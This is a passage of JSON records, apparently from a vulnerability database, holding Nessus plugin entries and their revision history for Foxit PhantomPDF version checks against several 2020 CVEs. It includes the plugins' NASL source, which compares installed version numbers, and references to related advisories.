"score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-24T11:53:55", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 9.7.5 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-30T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-09-24T11:53:55", "differentElements": ["vpr"], "edition": 10}, {"bulletin": {"id": "FOXIT_PHANTOM_9_7_5.NASL", "hash": "3b4808705bf4cabff1e6f0d6f6bc7355", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-30T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144647", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-10-18T11:44:42", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13557", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-28203", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13570"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1165", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1166", "TALOS-2020-1171"]}], "modified": "2021-10-18T11:44:42", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-18T11:44:42", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 9.7.5 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "6.7"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-30T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": []}, "lastseen": "2021-10-18T11:44:42", "differentElements": ["vpr"], "edition": 11}], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA12028"]}, {"type": "nessus", "idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_10_1_1.NASL"]}, {"type": "cve", "idList": ["CVE-2020-13557", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-28203", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13570"]}, {"type": "zdi", "idList": ["ZDI-20-1415"]}, {"type": "talos", "idList": ["TALOS-2020-1165", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1166", "TALOS-2020-1171"]}], "modified": "2021-10-18T11:44:42", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-10-18T11:44:42", "rev": 2}}, "objectVersion": "1.6", "pluginID": "144647", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/06/03\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n script_xref(name:\"IAVA\", value:\"2021-A-0099-S\");\n\n script_name(english:\"Foxit PhantomPDF < 9.7.5 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 9.7.5. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 9.7.5 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-27860\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '9.0', 'max_version' : '9.7.4.29600', 'fixed_version' : '9.7.5' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantom", "cpe:/a:foxitsoftware:phantompdf"], "solution": "Upgrade to Foxit PhantomPDF version 9.7.5 or later", "nessusSeverity": "Medium", "cvssScoreSource": "CVE-2020-27860", "vpr": {"risk factor": "Medium", "score": "5.9"}, "exploitAvailable": false, "exploitEase": "No known exploits are available", "patchPublicationDate": "2020-12-30T00:00:00", "vulnerabilityPublicationDate": "2020-12-09T00:00:00", "exploitableWith": [], "_object_type": "robots.models.nessus.NessusBulletin", "_object_types": ["robots.models.nessus.NessusBulletin", "robots.models.base.Bulletin"]}, {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "991b7c2e9acd42cb6fc4898e9f48b994", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows host is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2021-06-03T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13557", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27860", "http://www.nessus.org/u?a27a3e57", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13570", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13548", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28203", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13560", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13547"], "cvelist": ["CVE-2020-13547", "CVE-2020-13548", "CVE-2020-13557", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-27860", "CVE-2020-28203"], "immutableFields": [], "lastseen": "2021-10-18T23:46:22", "history": [{"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "70072646fb67a3c12066b095a498549213e8efe47d5f8d9f46c4e249156af97f", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2020-12-24T02:32:28", "history": [], "viewCount": 5, "enchantments": {"dependencies": {"modified": "2020-12-24T02:32:28", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-13570", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-24T02:32:28", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/23\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13547\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-12-24T02:32:28", "differentElements": ["cvss", "sourceData"], "edition": 1}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "d33ebbd4c7cb04cfd85e2de1c997c70d5c5317b4b4256c04ec20f444e641f0b2", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 9.0, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:P"}, "cvss2": {}, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2020-12-25T02:46:54", "history": [], "viewCount": 17, "enchantments": {"dependencies": {"modified": "2020-12-25T02:46:54", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2020-12-25T02:46:54", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/12/24\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a27a3e57\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Foxit PhantomPDF version 10.1.1 or later\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-13548\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/12/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/12/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantom\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:foxitsoftware:phantompdf\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"foxit_phantom_installed.nasl\");\n script_require_keys(\"installed_sw/FoxitPhantomPDF\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp = 'FoxitPhantomPDF';\n\napp_info = vcf::get_app_info(app:app, win_local:TRUE);\n\nconstraints = [\n { 'min_version' : '10.0', 'max_version' : '10.1.0.37527', 'fixed_version' : '10.1.1' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "naslFamily": "Windows", "cpe": ["cpe:/a:foxitsoftware:phantompdf", "cpe:/a:foxitsoftware:phantom"], "solution": "", "nessusSeverity": "", "cvssScoreSource": "", "vpr": {}, "exploitAvailable": false, "exploitEase": "", "patchPublicationDate": null, "vulnerabilityPublicationDate": null, "exploitableWith": []}, "lastseen": "2020-12-25T02:46:54", "differentElements": ["cvss", "cvss3", "reporter", "sourceData"], "edition": 2}, {"bulletin": {"id": "FOXIT_PHANTOM_10_1_1.NASL", "hash": "1f724cb9ae4beefa26d1ce0f7f3a0d95f867df93f87f29a3a1e009101dd8a097", "type": "nessus", "bulletinFamily": "scanner", "title": "Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities", "description": "According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.", "published": "2020-12-23T00:00:00", "modified": "2020-12-23T00:00:00", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/144566", "reporter": "This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://www.nessus.org/u?a27a3e57"], "cvelist": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "immutableFields": [], "lastseen": "2021-02-18T10:51:45", "history": [], "viewCount": 17, "enchantments": {"dependencies": {"modified": "2021-02-18T10:51:45", "references": [{"idList": ["FOXIT_READER_10_1_1.NASL", "FOXIT_PHANTOM_9_7_5.NASL"], "type": "nessus"}, {"idList": ["KLA12028"], "type": "kaspersky"}, {"idList": ["TALOS-2020-1166", "TALOS-2020-1181", "TALOS-2020-1175", "TALOS-2020-1171", "TALOS-2020-1165"], "type": "talos"}, {"idList": ["ZDI-20-1415"], "type": "zdi"}, {"idList": ["CVE-2020-28203", "CVE-2020-13560", "CVE-2020-27860", "CVE-2020-13570", "CVE-2020-13548", "CVE-2020-13547", "CVE-2020-13557"], "type": "cve"}], "rev": 2}, "score": {"modified": "2021-02-18T10:51:45", "rev": 2, "value": 7.3, "vector": "NONE"}}, "objectVersion": "1.6", "pluginID": "144566", "sourceData": "##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(144566);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/17\");\n\n script_cve_id(\n \"CVE-2020-13547\",\n \"CVE-2020-13548\",\n \"CVE-2020-13557\",\n \"CVE-2020-13560\",\n \"CVE-2020-13570\",\n \"CVE-2020-27860\",\n \"CVE-2020-28203\"\n );\n\n script_name(english:\"Foxit PhantomPDF < 10.1.1 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A PDF toolkit installed on the remote Windows host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the Foxit PhantomPDF application (formally known as Phantom) installed on the remote Windows\nhost is prior to 10.1.1. It is, therefore affected by multiple vulnerabilities: Note that Nessus has not tested for this\nissue but has instead relied only on the application's self-reported version number.\");\n # https://www.foxitsoftware.com/support/security-bulletins.html\n script_set_attribute(attribute:\"see_also\", 